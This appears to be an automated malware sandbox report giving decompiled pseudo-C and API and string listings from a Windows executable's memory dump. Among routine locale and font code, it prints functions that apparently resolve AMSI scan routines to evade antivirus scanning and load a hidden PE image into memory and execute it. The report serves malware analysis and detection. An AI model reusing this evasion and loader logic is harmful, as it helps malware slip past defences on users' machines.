Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow String ID: 00F$80F$MAINICON API String ID: 2763768735-2155582179 Opcode ID: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a Instruction ID: 3d65150858da70b31048973324385ee2371e73c537065fabeb210eff4a88cc2d Opcode Fuzzy Hash: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a Instruction Fuzzy Hash: B2516F706042849FDB10EF39D885B867BE4AF15308F4440BAEC48DF397DBB99948CB69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%

E0040D05C(void* __ebx, void* __edx, void* __edi, void* __esi) { char _v8; char _v12; char _v16; char _v20; char _v24; char _v28; char _v32; char _v36; char _v40; char _v44; char _v48; char _v52; char _v56; char _v60; char _v64; char _v68; void* _t104; void* _t111; void* _t133; intOrPtr _t183; intOrPtr _t193; intOrPtr _t194; _t191 = __esi; _t190 = __edi; _t193 = _t194; _t133 = 8; do { _push(0); _push(0); _t133 = _t133 - 1; } while (_t133 != 0); _push(__ebx); _push(_t193); _push(0x40d327); _push( *[fs:eax]); *[fs:eax] = _t194; // executed E0040CF98(); // executed E0040BA08(__ebx, __edi, __esi); _t196 = *0x4658d4; if( *0x4658d4 != 0) { E0040BBE0(__esi, _t196); } _t132 = GetThreadLocale(); E0040B954(_t43, 0, 0x14, &_v20); E00404790(0x465808, _v20); E0040B954(_t43, 0x40d33c, 0x1b, &_v24); *0x46580c = E00408B44(0x40d33c, 0, _t196); E0040B954(_t132, 0x40d33c, 0x1c, &_v28); *0x46580d = E00408B44(0x40d33c, 0, _t196); *0x46580e = E0040B9A0(_t132, 0x2c, 0xf); *0x46580f = E0040B9A0(_t132, 0x2e, 0xe); E0040B954(_t132, 0x40d33c, 0x19, &_v32); *0x465810 = E00408B44(0x40d33c, 0, _t196); *0x465811 = E0040B9A0(_t132, 0x2f, 0x1d); E0040B954(_t132, "m/d/yy", 0x1f, &_v40); E0040BC90(_v40, _t132, &_v36, _t190, _t191, _t196); E00404790(0x465814, _v36); E0040B954(_t132, "mmmm d, yyyy", 0x20, &_v48); E0040BC90(_v48, _t132, &_v44, _t190, _t191, _t196); E00404790(0x465818, _v44); *0x46581c = E0040B9A0(_t132, 0x3a, 0x1e); E0040B954(_t132, 0x40d370, 0x28, &_v52); E00404790(0x465820, _v52); E0040B954(_t132, 0x40d37c, 0x29, &_v56); E00404790(0x465824, _v56); E0040473C( &_v12); E0040473C( &_v16); E0040B954(_t132, 0x40d33c, 0x25, &_v60); _t104 = E00408B44(0x40d33c, 0, _t196); _t197 = _t104; if(_t104 != 0) { E004047D4( &_v8, 0x40d394); } else { E004047D4( &_v8, 0x40d388); } E0040B954(_t132, 0x40d33c, 0x23, &_v64); _t111 = E00408B44(0x40d33c, 0, _t197); _t198 = _t111; if(_t111 == 0) { E0040B954(_t132, 0x40d33c, 0x1005, &_v68); if(E00408B44(0x40d33c, 0, _t198) != 0) { E004047D4( &_v12, 0x40d3b0); } else { E004047D4( &_v16, 0x40d3a0); } } _push(_v12); _push(_v8); _push(":mm"); _push(_v16); E00404AC0(); _push(_v12); _push(_v8); _push(":mm:ss"); _push(_v16); E00404AC0(); *0x4658d6 = E0040B9A0(_t132, 0x2c, 0xc); _pop(_t183); *[fs:eax] = _t183; _push(E0040D32E); return E00404760( &_v68, 0x10); } 0x0040d05c 0x0040d05c 0x0040d05d 0x0040d05f 0x0040d064 0x0040d064 0x0040d066 0x0040d068 0x0040d068 0x0040d06b 0x0040d06e 0x0040d06f 0x0040d074 0x0040d077 0x0040d07a 0x0040d07f 0x0040d084 0x0040d08b 0x0040d08d 0x0040d08d 0x0040d097 0x0040d0a6 0x0040d0b3 0x0040d0c8 0x0040d0d7 0x0040d0ec 0x0040d0fb 0x0040d10e 0x0040d121 0x0040d136 0x0040d145 0x0040d158 0x0040d16d 0x0040d178 0x0040d185 0x0040d19a 0x0040d1a5 0x0040d1b2 0x0040d1c5 0x0040d1da 0x0040d1e7 0x0040d1fc 0x0040d209 0x0040d211 0x0040d219 0x0040d22e 0x0040d238 0x0040d23d 0x0040d23f 0x0040d258 0x0040d241 0x0040d249 0x0040d249 0x0040d26d 0x0040d277 0x0040d27c 0x0040d27e 0x0040d290 0x0040d2a1 0x0040d2ba 0x0040d2a3 0x0040d2ab 0x0040d2ab 0x0040d2a1 0x0040d2bf 0x0040d2c2 0x0040d2c5 0x0040d2ca 0x0040d2d7 0x0040d2dc 0x0040d2df 0x0040d2e2 0x0040d2e7 0x0040d2f4 0x0040d307 0x0040d30e 0x0040d311 0x0040d314 0x0040d326

APIs

GetThreadLocale.KERNEL32(00000000,0040D327,?,?,00000000,00000000), ref: 0040D092 Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972

Strings

m/d/yy , xrefs: 0040D161 mmmm d, yyyy , xrefs: 0040D18E :mm , xrefs: 0040D2C5 AMPM , xrefs: 0040D2A6 AMPM , xrefs: 0040D2B5 :mm:ss , xrefs: 0040D2E2

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy API String ID: 4232894706-2493093252 Opcode ID: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6 Instruction ID: c9001327b6f8c8ca4ed95205664730ab35d4fa54160187d9b8d5148293e8bd77 Opcode Fuzzy Hash: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6 Instruction Fuzzy Hash: 0D615E70B001499BDB00FBE5D891A9E76A6DB88304F50D43BB601BB7C6DB3CD919879E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 48%

E00460860(void* __ebx, void* __edi, void* __esi) { char _v8; char _v12; char _v16; char _v20; intOrPtr _v24; intOrPtr _v28; char _v32; intOrPtr* _t53; void* _t60; intOrPtr _t61; intOrPtr _t64; intOrPtr _t67; intOrPtr _t74; signed int _t75; intOrPtr _t86; signed int _t91; intOrPtr _t99; intOrPtr _t104; intOrPtr _t105; intOrPtr _t107; intOrPtr _t108; intOrPtr _t112; intOrPtr _t114; intOrPtr _t126; void* _t132; void* _t139; void* _t140; intOrPtr _t143; _t140 = __esi; _t139 = __edi; _push(0); _push(0); _push(0); _push(0); _push(0); _push(0); _push(0); _push(_t143); _push(0x460b18); _push( *[fs:eax]); *[fs:eax] = _t143; *0x46679c = *0x46679c - 1; if( *0x46679c < 0) { 0; _push(0x124f2); // executed L0045F394(); // executed if(0 == 0) { E00404790(0x466744, 0x460b44); } else { E00404790(0x466744, "rrrrrrrtutFrk"); } _t99 = *0x466744; // 0x27d5078 E00404A4C( &_v8, _t99, 0x460b50); E0045EBB0(_v8, 0x4666d8, 0x4666c8, "DllRegisterServer", _t140); // executed E004072FC(0x4666c8, L0045F39C); if( *0x4666d4 <= 0x206a) { 0; E0045EBB0("mssip32", 0x4666d8, 0x4666c8, "DllRegisterServer", _t140); // executed E004072FC(0x4666c8, L0045F39C); E00404AC0(); E00404934( &_v12, E00404C00(_v16)); _t104 = *0x4657f8; // 0x400000 *0x466730 = E0041CF2C(_t104, 1, 0xa, _v12); _t53 = *0x466730; // 0x27ea970 *0x4666bc = *((intOrPtr*)( *_t53))(0x460b94, *0x466744, 0x460b88); _t126 = *0x4666bc; // 0x35986 E00404E88(0x466768, _t126); _t60 = E00404C58(0x466768); _t61 = *0x466730; // 0x27ea970 _t7 = _t61 + 4; // 0xe _t105 = *0x4666bc; // 0x35986 E00402EFC( *_t7, 0x4666d8, _t105, _t60); _t64 = *0x466730; // 0x27ea970 E00403928(_t64); _t67 = *0x466768; // 0x2765838 E0045F4E8(_t67, &_v20, 0x460ba0); _t107 = *0x45f30c; // 0x45f310 E00405BC4(0x46676c, _t107, _v20); E0040473C(0x466750); _t74 = *0x46676c; // 0x27b0c98 _t10 = _t74 + 8; // 0x272fe08 _t75 = *_t10; __eflags = _t75; if(_t75 != 0) { _t91 = _t75 - 4; __eflags = _t91; _t75 = *_t91; } __eflags = _t75 - 1; if(_t75 >= 1) { *0x4666d8 = _t75; do { E00404924(); _t75 = E00404A08(0x466750, _v24); *0x4666d8 = *0x4666d8 - 1; __eflags = *0x4666d8; } while ( *0x4666d8 != 0); } _push(0x460b50); _push( *0x466744); _push("ScanString"); E00404AC0(); _push(_v28); _t108 = *0x466744; // 0x27d5078 E00404A4C( &_v32, _t108, 0x460b50); _pop(_t132); E0045EBB0(_v32, 0x4666d8, 0x4666c8, _t132, _t140); __eflags = E004072FC(0x4666c8, L0045F39C) * 0x177; _t86 = *0x466750; // 0x26fc4d8, executed E0045EEE8(_t86, 0x4666d8, _t139, _t140, E004072FC(0x4666c8, L0045F39C) * 0x177); // executed } else { L0045F39C(); } } _pop(_t112); *[fs:eax] = _t112; _push(0x460b1f); E00404760( &_v32, 3); _t114 = *0x45f30c; // 0x45f310 E00405B88( &_v20, _t114); return E00404760( &_v16, 3); } 0x00460860 0x00460860 0x00460865 0x00460866 0x00460867 0x00460868 0x00460869 0x0046086a 0x0046086b 0x00460874 0x00460875 0x0046087a 0x0046087d 0x00460880 0x00460887 0x00460893 0x00460896 0x0046089b 0x004608a2 0x004608bf 0x004608a4 0x004608ae 0x004608ae 0x004608c7 0x004608d2 0x004608e4 0x004608f8 0x00460907 0x0046091c 0x0046092d 0x00460941 0x00460964 0x00460976 0x00460981 0x00460993 0x0046099e 0x004609a7 0x004609b7 0x004609bd 0x004609cd 0x004609d4 0x004609d9 0x004609dc 0x004609e2 0x004609ed 0x004609f2 0x00460a05 0x00460a0a 0x00460a17 0x00460a1d 0x00460a2d 0x00460a32 0x00460a37 0x00460a37 0x00460a3a 0x00460a3c 0x00460a3e 0x00460a3e 0x00460a41 0x00460a41 0x00460a43 0x00460a46 0x00460a48 0x00460a4a 0x00460a5d 0x00460a6a 0x00460a6f 0x00460a71 0x00460a71 0x00460a4a 0x00460a7c 0x00460a81 0x00460a87 0x00460a94 0x00460a9c 0x00460aa0 0x00460aab 0x00460ab8 0x00460ab9 0x00460ad2 0x00460ad8 0x00460add 0x0046090c 0x0046090c 0x0046090c 0x00460907 0x00460ae4 0x00460ae7 0x00460aea 0x00460af7 0x00460aff 0x00460b05 0x00460b17

APIs

InetIsOffline.URL(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046089B AuditFree.ADVAPI32(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046090C Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9 Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01 Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35

Strings

ScanString , xrefs: 00460A87 DllRegisterServer , xrefs: 004608DF, 00460923 mssip32 , xrefs: 00460928 rrrrrrrtutFrk , xrefs: 004608A9 Msi , xrefs: 004608BA

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressAuditFreeHandleInetLibraryLoadModuleOfflineProc String ID: DllRegisterServer$Msi$ScanString$mssip32$rrrrrrrtutFrk API String ID: 1378522473-1273433984 Opcode ID: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199 Instruction ID: bf328fdb3b7fff0191df84ddc3a21c00582c8a3fcbdfa349bb387af89ecb309a Opcode Fuzzy Hash: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199 Instruction Fuzzy Hash: 1951B0743002058BD700EBA5D942A6A73A5EB85309F51C07BE900AB7E2EB7CED05CB5F

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 40%

E0045EEE8(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) { char _v8; char _v16; intOrPtr _v20; char _v24; intOrPtr _t73; intOrPtr _t74; void* _t81; struct HINSTANCE__* _t115; intOrPtr _t125; long _t127; intOrPtr _t128; intOrPtr _t130; signed int _t135; signed int _t139; long _t142; signed int _t144; void* _t147; signed int _t150; void* _t154; void* _t156; void* _t157; void* _t158; intOrPtr _t171; intOrPtr _t193; void* _t213; void* _t225; intOrPtr _t230; intOrPtr _t232; intOrPtr _t234; intOrPtr _t235; intOrPtr _t236; intOrPtr _t237; signed int _t241; intOrPtr* _t246; _push(0); _push(0); _push(0); _push(0); _push(0); _push(__ebx); _v8 = __eax; E00404BF0(_v8); _push(_t246); _push(0x45f200); _push( *[fs:eax]); *[fs:eax] = _t246; E00404790(0x466694, 0x45f21c); _push(0xd); _push(0xd); _push(0x1d); E00404A4C( &_v16, _v8, 0x45f228); *0x466634 = _v16; _push(0xd); _push(0xd); _push(0x1d); _push(0x45f244); _push( *0x466694); _push("ScanBuffer"); E00404AC0(); _push(_v20); _t171 = *0x466694; // 0x27d5088 E00404A4C( &_v24, _t171, 0x45f244); _pop(_t225); E0045EBB0(_v24, __ebx, 0x4666a0, _t225, 0x466644); E004072FC(0x4666a0, 0x466694); _t73 = *0x466634; // 0x2746268 _push(0); _push(_t73); _t74 = *0x466634; // 0x2746268 _t10 = _t74 + 0x3c; // 0x100 asm("cdq"); asm("adc edx, [esp+0x4]"); *0x46663c = *_t10 + *_t246; _push(0xd); _push(0xd); _push(0x1d); _t81 = VirtualAlloc(0, *( *0x46663c + 0x50), 0x2000, 1); // executed *0x466630 = _t81; _push(0xd); _push(0xd); _push(0x1d); *0x466638 = *0x466630 - *((intOrPtr*)( *0x46663c + 0x34)); _push(0xd); _push(0xd); _push(0x1d); _t230 = *0x46663c; _t231 = *(_t230 + 0x14) & 0x0000ffff; *0x466640 = *0x46663c + 0x18 + ( *(_t230 + 0x14) & 0x0000ffff); _push(0xd); _push(0xd); _t193 = 0x10; _push(0x1d); _t154 = ( *( *0x46663c + 6) & 0x0000ffff) - 1; if(_t154 >= 0) { _t158 = _t154 + 1; *0x466644 = 0; do { _push(_t193); _t135 = *0x466644 + *0x466644 * 4; _t234 = *0x466640; // 0x2746460 _t18 = _t135 * 8; // 0x10550 *0x46664c = *(_t234 + _t18 + 8); _push(_t193); _t139 = *0x466644 + *0x466644 * 4; _t235 = *0x466640; // 0x2746460 _t23 = _t139 * 8; // 0x10600 *0x466650 = *((intOrPtr*)(_t235 + _t23 + 0x10)); _push(_t193); _t142 = *0x46664c; // 0x10 _t144 = *0x466644 + *0x466644 * 4; _t236 = *0x466640; // 0x2746460 _t28 = _t144 * 8; // 0x1000 _t147 = VirtualAlloc( *((intOrPtr*)(_t236 + _t28 + 0xc)) + *0x466630, _t142, 0x1000, 4); // executed *0x466648 = _t147; _push(_t193); _t150 = *0x466644 + *0x466644 * 4; _t237 = *0x466640; // 0x2746460 _t33 = _t150 * 8; // 0x400 _t231 = *0x466648; // 0x2e9b000 _t193 = *0x466650; // 0x200 E00402EFC( *((intOrPtr*)(_t237 + _t33 + 0x14)) + *0x466634, _t158, _t193, _t231); *0x466644 = *0x466644 + 1; _t158 = _t158 - 1; } while (_t158 != 0); } _push(0xd); _push(0xd); _push(0x1d); *0x466658 = *((intOrPtr*)( *0x46663c + 0x28)) + *0x466630; _push(0xd); _push(0xd); _push(0x1d); E0045ECE4( *((intOrPtr*)( *0x46663c + 0xa0)) + *0x466630); _push(0xd); _push(0xd); _push(0x1d); E0045ED90( *((intOrPtr*)( *0x46663c + 0x80)) + *0x466630, _t154, 0x46663c, 0x466644); // executed _push(0xd); _push(0xd); _t213 = _t193 + 3 - 1 + 4 - 1 + 4 - 1 + 4 - 1 + 1; _push(0x1d); _t156 = ( *( *0x46663c + 6) & 0x0000ffff) - 1; if(_t156 >= 0) { _t157 = _t156 + 1; *0x466644 = 0; do { _push(_t213); _t241 = *0x466644 + *0x466644 * 4; _t125 = *0x466640; // 0x2746460 _t42 = _t241 * 8; // 0x60000020 _t127 = E0045EC64( *((intOrPtr*)(_t125 + _t42 + 0x24)), _t231); _t128 = *0x466640; // 0x2746460 _t45 = _t241 * 8; // 0x10550 _t130 = *0x466640; // 0x2746460 _t48 = _t241 * 8; // 0x1000 VirtualProtect( *((intOrPtr*)(_t130 + _t48 + 0xc)) + *0x466630, *(_t128 + _t45 + 8), _t127, 0x4666a4); // executed *0x466644 = *0x466644 + 1; _t157 = _t157 - 1; } while (_t157 != 0); } _t115 = *0x4666a8; // 0x738c0000 FreeLibrary(_t115); *0x466658( *0x466630, 1, 0, 0x1d, 0xd, 0xd); // executed _pop(_t232); *[fs:eax] = _t232; _push(0x45f207); E00404760( &_v24, 3); return E0040473C( &_v8); } 0x0045eeed 0x0045eeee 0x0045eeef 0x0045eef0 0x0045eef1 0x0045eef2 0x0045eef5 0x0045eefb 0x0045ef0c 0x0045ef0d 0x0045ef12 0x0045ef15 0x0045ef24 0x0045ef2d 0x0045ef30 0x0045ef34 0x0045ef41 0x0045ef49 0x0045ef52 0x0045ef55 0x0045ef59 0x0045ef5b 0x0045ef60 0x0045ef66 0x0045ef73 0x0045ef7b 0x0045ef7f 0x0045ef8a 0x0045ef97 0x0045ef98 0x0045efac 0x0045efb1 0x0045efb8 0x0045efb9 0x0045efba 0x0045efbf 0x0045efc2 0x0045efc6 0x0045efcd 0x0045efd3 0x0045efd6 0x0045efda 0x0045efeb 0x0045eff0 0x0045eff9 0x0045effc 0x0045f000 0x0045f00d 0x0045f017 0x0045f01a 0x0045f01e 0x0045f025 0x0045f027 0x0045f02d 0x0045f036 0x0045f039 0x0045f03c 0x0045f03d 0x0045f045 0x0045f048 0x0045f04e 0x0045f04f 0x0045f055 0x0045f055 0x0045f05e 0x0045f061 0x0045f067 0x0045f06b 0x0045f070 0x0045f079 0x0045f07c 0x0045f082 0x0045f086 0x0045f08b 0x0045f099 0x0045f0a1 0x0045f0a4 0x0045f0aa 0x0045f0b5 0x0045f0ba 0x0045f0bf 0x0045f0c8 0x0045f0cb 0x0045f0d1 0x0045f0db 0x0045f0e1 0x0045f0e7 0x0045f0ec 0x0045f0ee 0x0045f0ee 0x0045f055 0x0045f0f9 0x0045f0fc 0x0045f100 0x0045f10d 0x0045f116 0x0045f119 0x0045f11d 0x0045f12d 0x0045f136 0x0045f139 0x0045f13d 0x0045f14d 0x0045f156 0x0045f159 0x0045f15c 0x0045f15d 0x0045f165 0x0045f168 0x0045f16a 0x0045f16b 0x0045f171 0x0045f171 0x0045f17f 0x0045f182 0x0045f187 0x0045f18b 0x0045f191 0x0045f196 0x0045f19b 0x0045f1a0 0x0045f1ab 0x0045f1b0 0x0045f1b2 0x0045f1b2 0x0045f171 0x0045f1c2 0x0045f1c8 0x0045f1d7 0x0045f1df 0x0045f1e2 0x0045f1e5 0x0045f1f2 0x0045f1ff

APIs

Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9 Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01 Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35 VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,0000001D), ref: 0045EFEB VirtualAlloc.KERNEL32(-00465630,00000010,00001000,00000004,?,?,?,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F0B5 VirtualProtect.KERNEL32(-00465630,00010550,00000000,004666A4,?,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001), ref: 0045F1AB FreeLibrary.KERNEL32(738C0000,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F1C8

Strings

Msi , xrefs: 0045EF1F ScanBuffer , xrefs: 0045EF66

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocLibrary$AddressFreeHandleLoadModuleProcProtect String ID: Msi$ScanBuffer API String ID: 2006266006-3561555771 Opcode ID: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316 Instruction ID: f50dc9b62a688634fe35a12e90ff385b065f388c4a73e1f7ea8b28ac3d343785 Opcode Fuzzy Hash: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316 Instruction Fuzzy Hash: 86A17B716902819FE314DF48EC86F3173A8FB45709F21543FFA51DB2A2E6F4A8058E99

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%

E004543D8(char __edx, void* __edi) { char _v5; void* __ebx; void* __ecx; void* __ebp; intOrPtr _t25; intOrPtr* _t28; intOrPtr* _t29; intOrPtr* _t48; intOrPtr _t59; intOrPtr _t60; intOrPtr _t61; intOrPtr _t62; intOrPtr _t65; void* _t66; char _t67; void* _t77; struct HDC__* _t78; void* _t79; void* _t80; _t77 = __edi; _t67 = __edx; if(__edx != 0) { _t80 = _t80 + 0xfffffff0; _t25 = E00403C34(_t25, _t79); } _v5 = _t67; _t65 = _t25; E00420664(_t66, 0); _t28 = *0x462b90; // 0x461bb8 *((intOrPtr*)(_t28 + 4)) = _t65; *_t28 = 0x45477c; _t29 = *0x462ba0; // 0x461bc0 *((intOrPtr*)(_t29 + 4)) = _t65; *_t29 = 0x454788; E00454794(_t65); *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0); *((intOrPtr*)(_t65 + 0x4c)) = E004038F8(1); *((intOrPtr*)(_t65 + 0x50)) = E004038F8(1); *((intOrPtr*)(_t65 + 0x54)) = E004038F8(1); *((intOrPtr*)(_t65 + 0x58)) = E004038F8(1); *((intOrPtr*)(_t65 + 0x7c)) = E004038F8(1); _t78 = GetDC(0); *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a); ReleaseDC(0, _t78); _t11 = _t65 + 0x58; // 0x44c77c6e _t48 = *0x462d20; // 0x46632c *((intOrPtr*)( *_t48))(0, 0, E0045022C, *_t11); *((intOrPtr*)(_t65 + 0x84)) = E004256F8(1); *((intOrPtr*)(_t65 + 0x88)) = E004256F8(1); *((intOrPtr*)(_t65 + 0x80)) = E004256F8(1); E00454BC4(_t65, _t65, _t66, _t77); _t15 = _t65 + 0x84; // 0x38004010 _t59 = *_t15; *((intOrPtr*)(_t59 + 0xc)) = _t65; *((intOrPtr*)(_t59 + 8)) = 0x454a94; _t18 = _t65 + 0x88; // 0x90000000 _t60 = *_t18; *((intOrPtr*)(_t60 + 0xc)) = _t65; *((intOrPtr*)(_t60 + 8)) = 0x454a94; _t21 = _t65 + 0x80; // 0xcc000000 _t61 = *_t21; *((intOrPtr*)(_t61 + 0xc)) = _t65; *((intOrPtr*)(_t61 + 8)) = 0x454a94; _t62 = _t65; if(_v5 != 0) { E00403C8C(_t62); _pop( *[fs:0x0]); } return _t65; } 0x004543d8 0x004543d8 0x004543e0 0x004543e2 0x004543e5 0x004543e5 0x004543ea 0x004543ed 0x004543f3 0x004543f8 0x004543fd 0x00454400 0x00454406 0x0045440b 0x0045440e 0x00454416 0x00454422 0x00454431 0x00454440 0x0045444f 0x0045445e 0x0045446d 0x00454477 0x00454481 0x00454487 0x0045448c 0x0045449a 0x004544a1 0x004544af 0x004544c1 0x004544d3 0x004544db 0x004544e0 0x004544e0 0x004544e6 0x004544e9 0x004544f0 0x004544f0 0x004544f6 0x004544f9 0x00454500 0x00454500 0x00454506 0x00454509 0x00454510 0x00454516 0x00454518 0x0045451d 0x00454524 0x0045452d

APIs

GetKeyboardLayout.USER32 ref: 0045441D GetDC.USER32(00000000), ref: 00454472 GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C ReleaseDC.USER32 ref: 00454487

Strings

,cF , xrefs: 0045449A $BB , xrefs: 004544A5, 004544B7, 004544C9

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceKeyboardLayoutRelease String ID: $BB$,cF API String ID: 3331096196-156580243 Opcode ID: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6 Instruction ID: 0b584d1e58491fa1ea5d4c96f00a0c4a7644df09fe4235dac3e087649deaa05e Opcode Fuzzy Hash: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6 Instruction Fuzzy Hash: 9C31D7716042419FD740EF69D8C5B487BE4FB05319F4580BAF818DF3A3EB79A8489B19

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E00454BC4(void* __eax, void* __ebx, void* __ecx, void* __edi) { signed char _v5; struct tagLOGFONTA _v65; struct tagLOGFONTA _v185; struct tagLOGFONTA _v245; void _v405; void* _t23; int _t27; void* _t30; intOrPtr _t38; struct HFONT__* _t41; struct HFONT__* _t45; struct HFONT__* _t49; intOrPtr _t52; intOrPtr _t54; void* _t57; intOrPtr _t66; void* _t72; void* _t74; void* _t75; intOrPtr _t76; _t72 = __edi; _t74 = _t75; _t76 = _t75 + 0xfffffe6c; _t57 = __eax; _v5 = 0; if( *0x466580 != 0) { _t54 = *0x466580; // 0x27bf470 _v5 = *(_t54 + 0x88) & 0x000000ff; } _push(_t74); _push(0x454d0b); _push( *[fs:eax]); *[fs:eax] = _t76; if( *0x466580 != 0) { _t52 = *0x466580; // 0x27bf470 E00457684(_t52, 0); } if(SystemParametersInfoA(0x1f, 0x3c, &_v65, 0) == 0) { _t23 = GetStockObject(0xd); _t7 = _t57 + 0x84; // 0x38004010 E00425B48( *_t7, _t23, _t72); } else { _t49 = CreateFontIndirectA( &_v65); // executed _t6 = _t57 + 0x84; // 0x38004010 E00425B48( *_t6, _t49, _t72); } _v405 = 0x154; _t27 = SystemParametersInfoA(0x29, 0, &_v405, 0); // executed if(_t27 == 0) { _t14 = _t57 + 0x80; // 0xcc000000 E00425C2C( *_t14, 8); _t30 = GetStockObject(0xd); _t15 = _t57 + 0x88; // 0x90000000 E00425B48( *_t15, _t30, _t72); } else { _t41 = CreateFontIndirectA( &_v185); _t11 = _t57 + 0x80; // 0xcc000000 E00425B48( *_t11, _t41, _t72); _t45 = CreateFontIndirectA( &_v245); _t13 = _t57 + 0x88; // 0x90000000 E00425B48( *_t13, _t45, _t72); } _t16 = _t57 + 0x80; // 0xcc000000 E004258CC( *_t16, 0xff000017); _t17 = _t57 + 0x88; // 0x90000000 E004258CC( *_t17, 0xff000007); _pop(_t66); *[fs:eax] = _t66; _push(0x454d12); if( *0x466580 != 0) { _t38 = *0x466580; // 0x27bf470 return E00457684(_t38, _v5 & 0x000000ff); } return 0; } 0x00454bc4 0x00454bc5 0x00454bc7 0x00454bce 0x00454bd0 0x00454bdb 0x00454bdd 0x00454be9 0x00454be9 0x00454bee 0x00454bef 0x00454bf4 0x00454bf7 0x00454c01 0x00454c05 0x00454c0a 0x00454c0a 0x00454c20 0x00454c3c 0x00454c43 0x00454c49 0x00454c22 0x00454c26 0x00454c2d 0x00454c33 0x00454c33 0x00454c4e 0x00454c65 0x00454c6c 0x00454ca2 0x00454cad 0x00454cb4 0x00454cbb 0x00454cc1 0x00454c6e 0x00454c75 0x00454c7c 0x00454c82 0x00454c8e 0x00454c95 0x00454c9b 0x00454c9b 0x00454cc6 0x00454cd1 0x00454cd6 0x00454ce1 0x00454ce8 0x00454ceb 0x00454cee 0x00454cfa 0x00454d00 0x00000000 0x00454d05 0x00454d0a

APIs

